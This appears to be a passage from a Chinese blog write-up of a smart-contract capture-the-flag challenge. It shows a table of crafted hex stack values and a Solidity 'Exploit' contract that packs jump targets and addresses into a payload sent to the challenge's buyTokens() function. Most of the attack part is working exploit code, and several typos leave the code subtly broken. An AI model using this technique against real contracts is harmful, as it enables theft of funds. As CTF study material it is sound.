000000000000000000000000deaDDeADDEaDdeaDdEAddEADDEAdDeadDEADDEaD//var6 = deadbeaf 000000000000000000000000000000000000000000000000000000000000191B//var7 = jumpback 000000000000000000000000000000000000000000000002b5e3af16b1880004//var6 = balance 0000000000000000000000000000000000000000000000000000000000000000//var7 = addr任意 0000000000000000000000000000000000000000000000000000000000000000//var6 = back1 0000000000000000000000000000000000000000000000000000000000000000//var7 = back2 0000000000000000000000000000000000000000000000000000000000000001//var6 = back3 0000000000000000000000000000000000000000000000000000000000000000//var7 = back4 0000000000000000000000000000000000000000000000000000000000000000//var6 = back5 0000000000000000000000000000000000000000000000000000000000000000//var7 = back6 0000000000000000000000000000000000000000000000000000000000001563//var6 = back7:下一个位点 0000000000000000000000000000000000000000000000000000000000000000//var7 = value = 0 0000000000000000000000000000000000000000000000000000000000000000//var6 = y = 0 000000000000000000000000DA0bab807633f07f013f94DD0E6A4F96F8742B53//var7 = akey=address(setup) 0000000000000000000000000000000000000000000000000000000000000000//var6 = x = 0 0000000000000000000000000000000000000000000000000000000000000C4A//var7 = jumpBack 0000000000000000000000000000000000000000000000000000000000000366//var6 = exit 0000000000000000000000000000000000000000000000000000000000000000//var7 = Not Use
在上面的分析中,我们已经知道了破解所需要的步骤,现在将其整理出来:

pragm solidity ^0.7.0;
import "./Setup.sol";
contract Exploit {
Setup public setup;
ChallengeInterface public challenge;
bytes32[] public payload;
constructor(address _setup) public payable{
setup = Setup(_setup);
challenge = setup.challenge();
}
function preHack() public {
(bool success, ) = challenge.call(abi.encodeWithSelector(0x27f83350,0x19FC));
require(success,"Exploit/prehack failed");
}
function wrapIntoStack(bytes32 a, bytes32 b) internal {
uint len = payload.length / 4;
payload.push(
hex'00000000000000000000000000000000000000000000000000000000000019FC');
uint offset = 4 + 32*4*len;
payload.push(bytes32(offset));
payload.push(a);
payload.push(b);
}
function hack() public {
preHack();
payload.push(bytes32(uint(4)));
bytes32 task1_deadbeaf =
hex'000000000000000000000000deaDDeADDEaDdeaDdEAddEADDEAdDeadDEADDEaD';
bytes32 task1_jumpback =
hex'000000000000000000000000000000000000000000000000000000000000191B';
wrapIntoStack(task1_deadbeaf, task1_jumpback);
bytes32 task2_balance =
hex'000000000000000000000000000000000000000000000002b5e3af16b1880004';
bytes32 task2_addr = bytes32(uint256(uint160(address(msg.sender))));
wrapIntoStack(task2_balance, task2_addr);
bytes32 task3_back1 =
hex'0000000000000000000000000000000000000000000000000000000000000000';
bytes32 task3_back2 =
hex'0000000000000000000000000000000000000000000000000000000000000000';
bytes32 task3_back3 =
hex'0000000000000000000000000000000000000000000000000000000000000001';
bytes32 task3_back4 =
hex'0000000000000000000000000000000000000000000000000000000000000000';
bytes32 task3_back5 =
hex'0000000000000000000000000000000000000000000000000000000000000000';
bytes32 task3_back6 =
hex'0000000000000000000000000000000000000000000000000000000000000000';
wrapIntoStack(task3_back1, task3_back2);
wrapIntoStack(task3_back3, task3_back4);
wrapIntoStack(task3_back5, task3_back6);
bytes32 task4_back7 =
hex'0000000000000000000000000000000000000000000000000000000000001563';
bytes32 task4_value =
hex'0000000000000000000000000000000000000000000000000000000000000000';
wrapIntoStack(task4_back7, task4_value);
bytes32 task4_y =
hex'0000000000000000000000000000000000000000000000000000000000001563';
bytes32 task4_setup_addr = bytes32(uint256(uint160(address(setup))));;
wrapIntoStack(task4_y, task4_setup_addr);
bytes32 task4_x =
hex'0000000000000000000000000000000000000000000000000000000000000000';
bytes32 task4_jumpBack =
hex'0000000000000000000000000000000000000000000000000000000000000C4A';
wrapIntoStack(task4_x, task4_jumpBack);
bytes32 task5_exit =
hex'0000000000000000000000000000000000000000000000000000000000000366';
bytes32 task5_Unused =
hex'0000000000000000000000000000000000000000000000000000000000000000';
wrapIntoStack(task5_exit, task5_Unused);
(bool success, ) = challenge.call{value:0x04}(abi.encodeWithSignature("buyTokens()",payload));
console.log(payload);
require(success, "Exploit/hack failed");
}
}
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!